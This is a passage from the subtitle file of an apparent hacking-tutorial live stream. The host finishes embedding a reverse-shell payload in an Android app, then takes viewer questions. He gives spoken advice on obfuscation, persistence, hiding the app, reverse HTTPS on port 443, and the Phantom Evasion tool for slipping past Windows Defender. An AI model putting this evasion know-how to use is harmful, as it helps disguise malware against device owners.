00:31:21,600 was very, very, very small error. And if we just take a look at the sorry, if we just take a look 306 00:31:21,600 --> 00:31:28,640 at the we just list the files here, sorry, let me just list the files. You can see that under the 307 00:31:28,640 --> 00:31:34,800 dist folder. Under the dist folder, we have the compiled application here. And now that is not 308 00:31:34,800 --> 00:31:40,320 signed, that is something to take into consideration. But we have successfully embedded the payload 309 00:31:40,320 --> 00:31:45,600 within the Android application. So now that we've embedded it, whenever we launch this application, 310 00:31:45,600 --> 00:31:51,120 and because it is a launcher, it will constantly be active. And whenever the main activity is 311 00:31:51,120 --> 00:31:56,640 triggered, we will get our payload session. Now, the other videos that I want to make is we need 312 00:31:56,640 --> 00:32:01,440 to obfuscate, we need to focus on obfuscation, because that is primarily going to be how you 313 00:32:01,440 --> 00:32:06,000 get the application on a particular device. And then the other one is persistence through either 314 00:32:06,000 --> 00:32:11,840 creating a script. And of course, that's going to depend on on on creating a persistent script, 315 00:32:11,840 --> 00:32:15,600 essentially getting the application to run. And then finally, the video I'll be making last is 316 00:32:15,600 --> 00:32:21,840 how to hide the application from the application drawer. Alright, so that's pretty much what I'm 317 00:32:21,840 --> 00:32:27,200 going to be covering for this live stream. I know you guys wanted me to cover quite a bit more, 318 00:32:27,200 --> 00:32:31,760 but that's all I have time for. And I'll be making the other videos following up. So my next video 319 00:32:31,760 --> 00:32:37,280 on Android will be signing the application, then making it fully undetectable as best as possible. 320 00:32:37,280 --> 00:32:43,120 But for those of you who are curious, you can also use the backwash apk, the backwash script. 321 00:32:43,120 --> 00:32:48,720 So yeah, I know Mike telling me to change my ISP. Yes, I am working on that. 322 00:32:52,000 --> 00:32:55,840 Thanks, bro, for this video. Yes, this video will be available after the stream. 323 00:32:57,040 --> 00:33:02,320 Can we do it to any apps above 10 megabytes? Yes, you can do it to most of the applications. 324 00:33:02,320 --> 00:33:06,960 But again, it's all about how the application was developed. If the application was developed 325 00:33:07,680 --> 00:33:14,240 differently than in the sense that they have various renaming for the activities for the 326 00:33:14,240 --> 00:33:17,680 main activities, then you pretty much will be will have some errors. 327 00:33:21,280 --> 00:33:27,360 We have a message from photo slash Hey, no wait, want to see it in action, you'll see it in action 328 00:33:27,360 --> 00:33:31,920 in the next video, I'll use the exact same application. And I'll show you what happens 329 00:33:31,920 --> 00:33:36,160 when you try and install it directly on the latest version of Android, which is Android nine, 330 00:33:36,640 --> 00:33:41,920 what will happen on Android nine is it'll actually warn you that the application is malicious. 331 00:33:41,920 --> 00:33:45,760 And that's primarily because we're using the reverse TCP payload, if we were using 332 00:33:46,640 --> 00:33:55,200 the reverse HTTP or HTTPS, and we with port 443, then that should should potentially avoid detection. 333 00:33:55,200 --> 00:34:00,800 But again, obfuscation will be quite important. Alright, so I'll answer a few more questions. 334 00:34:01,600 --> 00:34:06,160 And end the stream here. So again, I really, really appreciate you guys watching the stream. 335 00:34:09,040 --> 00:34:12,400 Are you from Kenya? Yes, I am in Kenya majority of the time for work. 336 00:34:23,200 --> 00:34:29,520 Let's see, how do I feel about the use of ADB shell? ADB is very, very powerful. I'm guessing 337 00:34:29,520 --> 00:34:34,320 you're talking about forensics, right? Not too sure. Just give me a bit of give me a bit more 338 00:34:34,320 --> 00:34:46,640 information. No more questions. You can use the hackersploit tag so I can see your message a bit 339 00:34:46,640 --> 00:34:56,000 more clearly. Yes, I've heard of West Parklands. I'm not sure West Parklands, but I know about 340 00:34:56,000 --> 00:35:07,760 Parklands. Let's see. What's my career? I mentioned this previously, I'm a network penetration tester. 341 00:35:11,440 --> 00:35:15,120 Yeah, we'll also cover sharing methods. Um, yeah, I will do. I'm guessing you're talking 342 00:35:15,120 --> 00:35:19,760 about social engineering. What are my qualifications? Well, I am a penetration 343 00:35:19,760 --> 00:35:26,560 tester. So I have network plus Linux plus, and OSCP. Those are my professional certifications. 344 00:35:31,360 --> 00:35:37,920 Yeah, per and I, Kalita, how make it how to make it fully undetectable. Yes, I will be making a 345 00:35:37,920 --> 00:35:42,960 video on that. That is a very, again, very, very tricky. And it does involve a bit of manual work. 346 00:35:42,960 --> 00:35:48,480 So the scripts really don't work nowadays. Thanks for enjoy your day. Love your channel. 347 00:35:48,640 --> 00:35:52,400 From Ethiopia. Thank you very much. Love to Ethiopia. I appreciate your support. 348 00:36:07,520 --> 00:36:09,680 The videos are going to come daily as I mentioned. 349 00:36:13,120 --> 00:36:16,880 You can go over port forwarding. Yes, I am going to make a video on port forwarding, 350 00:36:16,880 --> 00:36:21,040 manual port forwarding. Do I have a course on Udemy? Yes, I have one. As I said, we are 351 00:36:21,040 --> 00:36:26,960 migrating our courses onto the Hackersploit Academy, which is at hackersploit.io. 352 00:36:33,440 --> 00:36:38,320 I've been doing my CH certification. What is my best scope? I am guessing your best 353 00:36:38,320 --> 00:36:42,000 opportunities. That's what you mean. Are there very many opportunities you can become? 354 00:36:42,960 --> 00:36:48,560 You can become a penetration tester. You can work in in forensics. You can do a lot of stuff with CH. 355 00:36:53,760 --> 00:36:57,440 Have you tried Ghidra? Yes, I did try it. I had my one of my friends, 356 00:36:57,440 --> 00:37:00,560 who is a malware analysis and reverse engineer, 357 00:37:01,360 --> 00:37:04,400 make the video on the channel. I pretty much I think you've checked it. 358 00:37:04,400 --> 00:37:11,440 Is OSCP a bit hard? OSCP is all about practice, as far as I know. You should pretty much just 359 00:37:11,440 --> 00:37:18,720 practice Volnub. I'll be also making a series on the OSCP press, the prep machines for Volnub. 360 00:37:19,600 --> 00:37:28,240 Do I use Termax? Yes, I do use Termax. Greetings to Russia. 361 00:37:28,320 --> 00:37:32,640 Thank you very much for joining the stream, even though I'm pretty much going to be ending it in a 362 00:37:32,640 --> 00:37:42,160 few minutes. We'll be releasing our courses on Hackersploit Academy this weekend. Apologies for 363 00:37:42,160 --> 00:37:46,880 that. Let me just re let me just open up my virtual machine right over here. 364 00:37:47,360 --> 00:37:51,840 Here's malware analysis stuff. I wouldn't say it's tough. I think it's just really exciting 365 00:37:51,840 --> 00:37:56,000 and very, very different for each piece of malware you start working with. 366 00:37:57,200 --> 00:38:03,200 Ford Mustafa, thank you so much from Canada. Thank you. Glad you enjoyed the video. 367 00:38:17,520 --> 00:38:22,640 Greetings from Poland. Love from India. Thank you very much. I appreciate it. 368 00:38:25,600 --> 00:38:28,720 You guys can post any other questions you have left because I'm really 369 00:38:28,720 --> 00:38:31,840 strapped for time at the moment. So if you have any important questions, go ahead. 370 00:38:36,240 --> 00:38:41,120 Let's see. How many ears do you have? I have two ears. 371 00:38:41,120 --> 00:38:48,080 Yes, I have videos on Ops spoofing. You can check my channel just search for 372 00:38:48,080 --> 00:38:50,560 Hackersploit Ops spoofing. You should find the video. 373 00:38:59,760 --> 00:39:02,080 What do I think of Ghidra? It's a very good tool. 374 00:39:04,960 --> 00:39:08,720 Ghidra I think is just very different than what anyone has ever used before. So again, 375 00:39:08,720 --> 00:39:11,760 it's just about it's just about getting used to it. 376 00:39:15,280 --> 00:39:21,360 Tips on OSCP learn post exploitation learn file transfers between Linux, 377 00:39:21,360 --> 00:39:28,240 Linux boxes and Linux and Windows boxes. Learn about exploit modification. That's very, 378 00:39:28,240 --> 00:39:36,880 very important. binary CTF Yeah, a lot of CTF videos come coming up. I have a few of the CTF 379 00:39:36,880 --> 00:39:46,000 challenges. I'm also going to be doing hack the box live. The next hosting for Metasploit with 380 00:39:46,000 --> 00:39:52,480 all ports open. I'm as I said, I'm going to do manual port forwarding. I'll also show you 381 00:39:52,480 --> 00:40:05,920 how to use the no IP port forwarding. Live in Kenya also you like you in Great Wall Garden. I'm 382 00:40:05,920 --> 00:40:16,640 not sure what that means. Is it necessary to be grad or self learned or to be a graduate of 383 00:40:16,640 --> 00:40:20,960 self learned? Have a good scope. I think just having experience in what and being good in 384 00:40:20,960 --> 00:40:28,720 what you do really good really goes a long way. You can reach me life of a hacker you can reach 385 00:40:28,720 --> 00:40:34,000 me via my email. My email is always linked in the community section of the channel or 386 00:40:34,000 --> 00:40:41,440 hackersploit at gmail.com. That's my public gmail, gmail address that I use. Am I an Avenger, 387 00:40:41,440 --> 00:40:46,720 an Avenger fan? No, sadly, I'm not. I really haven't been watching any of the latest movies. 388 00:40:46,720 --> 00:41:00,320 So apologies. Davide Carlissof. Hi from Italy. Hello. You sound like Mufti Menk. Yes, I've got 389 00:41:00,320 --> 00:41:06,640 that a lot. I actually do watch some of his videos. Sometimes on Facebook, when I do get sent those 390 00:41:06,640 --> 00:41:14,240 videos telling me that I do sound like him. So yeah, I guess so. ng rock. Yeah, I've made a video 391 00:41:14,240 --> 00:41:23,840 on ng rock. You can check that out as well. That's very, very good. Eugene Lihasi. Hi from Kenya. 392 00:41:23,840 --> 00:41:29,120 Hello. Did I use PowerShell? No, I did not use PowerShell. I'm just have a different theme for 393 00:41:29,120 --> 00:41:38,160 my terminal. Hello from Morocco. Hello. Any video about Empire? Yes, I'm making videos about 394 00:41:38,160 --> 00:41:41,680 Android first, then I'll move on to using Cobalt Strike and Empire. 395 00:41:44,880 --> 00:41:48,720 Sorry, many of you guys want me to look at the camera when answering the questions. I'll do 396 00:41:48,720 --> 00:41:55,840 that again. Who writes my articles? I write them personally at the moment. Hi from Hungary. Hello. 397 00:41:59,120 --> 00:42:07,120 Mubasher Assad. Yes, there isn't a course yet. We are releasing this weekend, as I mentioned, 398 00:42:07,120 --> 00:42:14,640 our first courses. What version of Linux are you using? I'm using Linux, Kali Linux 2019.1. 399 00:42:18,320 --> 00:42:26,000 Any tips to follow before scoring well in the CH exam? I guess just read up on your notes or read 400 00:42:26,000 --> 00:42:31,920 up on the handbook. It should be a multiple choice question. CH was pretty simple for me. 401 00:42:31,920 --> 00:42:39,600 It shouldn't be a difficult exam at all. Have a good day. God bless. God bless you too. 402 00:42:41,520 --> 00:42:47,600 Can you make more videos on Vail? Yes, I will make more videos on Vail evasion. I believe I have 403 00:42:47,600 --> 00:42:55,200 before, but I will follow them up. The problem with Vail is whether you're using, for example, 404 00:42:55,200 --> 00:43:01,040 if I use an encoder with MSF Venom like Chicago, Ghana for Windows. Most of the time, 405 00:43:01,040 --> 00:43:05,200 if you're working with Windows 10, because they have Windows Defender constantly updated with the 406 00:43:05,200 --> 00:43:16,400 latest signatures, it pretty much will not work or will be detected. My ISP doesn't support port 407 00:43:16,400 --> 00:43:22,240 forwarding. Why is that? Hands asking for hosting with all ports or particular ports. Do you have 408 00:43:22,240 --> 00:43:29,760 access to your main router? Love from South Korea. Same here. Love to South Korea. 409 00:43:31,840 --> 00:43:36,560 Have I hacked anyone? No, I haven't hacked anyone. Do bug bounty? Do you do bug? Yes, 410 00:43:36,560 --> 00:43:48,080 I do do some bug bounty on bug crowd. What will I do today? I've already recorded or I've already 411 00:43:48,080 --> 00:43:57,760 live streamed the recording of what I wanted to do. We have a good question from James Moreno. 412 00:43:58,480 --> 00:44:05,440 Advice, please. I have a bachelor of science in information systems. That's a good start, 413 00:44:05,440 --> 00:44:09,360 a very good start. And I want to get into pen testing. Where should I go from here? I would 414 00:44:09,360 --> 00:44:14,160 recommend taking the network plus certification as always do. If you don't want to, that's fine. It 415 00:44:14,160 --> 00:44:19,840 just gives you great information to begin with before you go into anything like OSCP. I definitely 416 00:44:19,840 --> 00:44:27,920 recommend going for OSCP security plus and pen test plus as well, which is the one of the 417 00:44:27,920 --> 00:44:34,400 latest certifications. ch is also very, very good if you want an introduction into cyber security. 418 00:44:34,400 --> 00:44:44,640 I can make a detailed video on OSCP tips and bug bounty videos. Yes, I'm going to be showing 419 00:44:44,640 --> 00:44:50,320 you guys what environment I've set up for bug bounty videos. Have I got paid for any bugs? Yes, 420 00:44:50,320 --> 00:44:57,280 I've got paid for three bugs in my lifetime. I think the total to about maybe $800. So not 421 00:44:57,280 --> 00:45:03,120 any big bugs particularly. But again, it's just that I don't have the time for bug bounty. But 422 00:45:03,120 --> 00:45:29,040 when I do, I usually try it out. Greetings to Ukraine. Wismaster got it correct in many of 423 00:45:29,040 --> 00:45:35,440 the issues with port forwarding are because of NAT, NAT configurations. And if your ISP is 424 00:45:36,160 --> 00:45:42,800 particularly doing it connected internet to your entire building, that is a common syndrome. 425 00:45:46,560 --> 00:45:50,720 What's the best way to get your payloads undetectable by Windows Defender? Well, 426 00:45:50,720 --> 00:45:55,040 I've been working or I've been taking a look at one of these scripts here. I don't know if I can 427 00:45:55,040 --> 00:45:59,920 just show you this. I was planning to make a video on it. It is the Phantom evasion tool. 428 00:45:59,920 --> 00:46:06,160 Phantom evasion tool allows you here if I can just launch it. Yeah, let me let me just launch it. 429 00:46:06,160 --> 00:46:15,040 Python, phantom evasion.py. So let me just start this up here. Phantom evasion allows you to 430 00:46:15,040 --> 00:46:20,400 generate various stages here. So I'll show you this right now. So you have your C, 431 00:46:20,400 --> 00:46:24,400 meterpreter stager. I'll get to that. So in your Windows modules, 432 00:46:25,360 --> 00:46:28,640 you have your shellcode injection, you have your stages. So if you're looking for stages, 433 00:46:28,640 --> 00:46:33,600 which I'm guessing you are, you can find them right over here. So if you're on your 64 bit stages, 434 00:46:33,600 --> 00:46:39,440 you have your reverse TCP virtual unlock, which works great if you are looking particularly to 435 00:46:42,800 --> 00:46:47,680 essentially prevent detection by Windows Defender. I would recommend these stages modules here. 436 00:46:50,400 --> 00:47:03,120 What is my opinion about Elan security? I haven't I haven't consumed any of their courses yet, 437 00:47:03,120 --> 00:47:06,480 but I'll definitely try them out. They look like they have very, very good courses. 438 00:47:11,120 --> 00:47:15,600 How do you let the terminal continue suggestions? I think you're talking about auto completion. 439 00:47:15,600 --> 00:47:20,480 That is the tab based on the current file structure, or whether or not you have the 440 00:47:20,480 --> 00:47:25,040 file in that particular directory. So just use your tab key, and that should auto complete for 441 00:47:25,040 --> 00:47:35,280 you to the nearest approximation. Yes, you can and I do recommend using reverse HTTP on Android, 442 00:47:35,280 --> 00:47:43,520 because you can actually make it you can make it sort of undetectable by by essentially monitoring 443 00:47:43,520 --> 00:47:48,240 the traffic coming from the application because everything will be going to and from port 443. 444 00:48:01,920 --> 00:48:07,360 Graham Hughes, good day from Australia. Same to you, sir. How are you guys doing over there? 445 00:48:08,320 --> 00:48:14,640 How to start malware analysis? That's a good question. A lot of things to cover. I'll probably 446 00:48:14,640 --> 00:48:17,200 have to make an introduction video to that as well because 447 00:48:20,240 --> 00:48:27,680 Rakesh Sharma asks me are the courses by Pentest Academy? I believe you're talking about Vivek. 448 00:48:27,680 --> 00:48:35,680 Yes, they're really good courses. Apologies, one of my Android devices here is giving me 449 00:48:36,000 --> 00:48:45,040 notifications. Sorry about that. Hello, Imran. It's good seeing you as well. It's been a long 450 00:48:45,040 --> 00:48:53,440 time. How are you? How are you doing? Oh, nice. Sorry about that, Hughes. I didn't see that at 451 00:48:53,520 --> 00:48:57,360 623 am. Yep, that that's definitely Australia. 452 00:49:04,640 --> 00:49:10,000 Eric risco, I liked your recent collab with it career questions. Yes, I just made the video 453 00:49:10,000 --> 00:49:16,880 yesterday. Very, very good questions. You can check that out as well. I have about one minute 454 00:49:16,880 --> 00:49:31,200 left to ask you questions. So go ahead and shoot. Do you know any rat with eternal blue exploit? I'm 455 00:49:31,200 --> 00:49:36,880 not sure what you mean by that remote access tool, usually as the payload and then which you install 456 00:49:36,880 --> 00:49:41,440 on the client and then you have the server sitting on the server really. So I'm guessing 457 00:49:41,440 --> 00:49:45,200 you're talking about the exploit, the actual exploit is getting the payload installed. So 458 00:49:45,200 --> 00:49:49,680 you can consider the eternal blue exploit a form of a remote access tool. However, 459 00:49:49,680 --> 00:49:52,240 remote access tool does give you more functionality. 460 00:49:55,680 --> 00:50:00,000 Wi Fi pen test. Yes, I have videos on that you can check out my the playlist. I have 461 00:50:00,000 --> 00:50:02,240 the WPA2 penetration testing videos. 462 00:50:11,120 --> 00:50:14,320 Life of a hacker. I think I'm going to send a notification on your phone. Let me check 463 00:50:15,520 --> 00:50:21,360 Um, I don't think it got any other emails here. Anyway, that's that's that. 464 00:50:28,160 --> 00:50:31,040 Antoine, you from India? No, I'm not from India. 465 00:50:33,200 --> 00:50:37,360 Although India is a pretty cool place. I would love to visit one, 466 00:50:37,360 --> 00:50:41,200 one one time. It looks like a really really interesting place culturally. 467 00:50:45,200 --> 00:50:58,720 Do I earn from YouTube? Yes, the channel is monetized to a certain extent. But again, 468 00:50:58,720 --> 00:51:03,360 because of the limitations in regards to the videos that I can monetize, I don't earn a lot 469 00:51:03,360 --> 00:51:09,760 are really just goes into the hosting and stuff like that. Yeah, I'll definitely check on your 470 00:51:09,760 --> 00:51:20,080 message out a life of a hacker. Thank you very much, Krishna. I appreciate it. 471 00:51:20,080 --> 00:51:40,240 It found bugs in which I believe I found a bug in. Well, that was actually a free bug bounty, 472 00:51:40,240 --> 00:51:45,120 or actually got I think the community score that was the first site that I got a bounty 473 00:51:46,080 --> 00:51:52,320 on was humble bundle, which, as you already know, is a site that has all of these bundles, 474 00:51:52,320 --> 00:51:59,520 which I am to do a giveaway on by the way, I then I believe it was a startup company that a video 475 00:51:59,520 --> 00:52:06,000 platform that I found the second bug, it was remote code execution, I believe I'll have to 476 00:52:06,000 --> 00:52:11,200 actually post all of these, these exact details in regards to the bounties. 477 00:52:15,120 --> 00:52:35,920 Now this channel been on YouTube for about three years now. The the exploit application has been 478 00:52:35,920 --> 00:52:40,800 inactive now because it was kicked off the Google Play Store, sadly, because of the content that it 479 00:52:40,800 --> 00:52:49,600 has. Google is really really strict community guidelines now. I would recommend getting the 480 00:52:49,600 --> 00:52:55,440 CH first if you are interested in it and then get the OSCP. You have security plus that's pretty cool. 481 00:52:55,440 --> 00:53:14,000 Also, my hacking machine setup, I don't have a dedicated setup, but I do have an environment 482 00:53:14,000 --> 00:53:21,120 that I do create with. I do have a collection of tools that I do use constantly. So I'll probably 483 00:53:21,120 --> 00:53:25,120 make a video on that. Yes, the video will be uploaded when the broadcast is complete. 484 00:53:32,320 --> 00:53:35,200 All right, I'll just be here for a few more seconds now. 485 00:53:45,280 --> 00:53:47,440 Yeah, I think I'll pretty much end the video here. 486 00:53:47,840 --> 00:53:51,600 Thank you very much, guys, for joining me on the stream. I really, really appreciate it. 487 00:53:51,600 --> 00:53:56,560 Let me just answer one more question. How to act the same network without using payload. 488 00:53:56,560 --> 00:54:01,520 I'm not sure what you mean and what devices you're talking about. Car hacking videos. Yes, 489 00:54:01,520 --> 00:54:06,720 I am working on a large project on that, but that is going to involve OBD, 490 00:54:06,720 --> 00:54:11,280 the OBD connection to the vehicle, because that is the most common connector. 491 00:54:17,920 --> 00:54:22,080 Yeah. So thank you so much for watching the stream, guys. I really, really appreciate it. 492 00:54:22,080 --> 00:54:27,600 You can post any of your other questions on my on my social networks, or you can actually contact 493 00:54:27,600 --> 00:54:34,400 me on my forum, hackersplay.org. And yeah, I'll be seeing you guys later. So thank you so much. 494 00:54:34,400 --> 00:54:37,360 And yeah, peace. 62218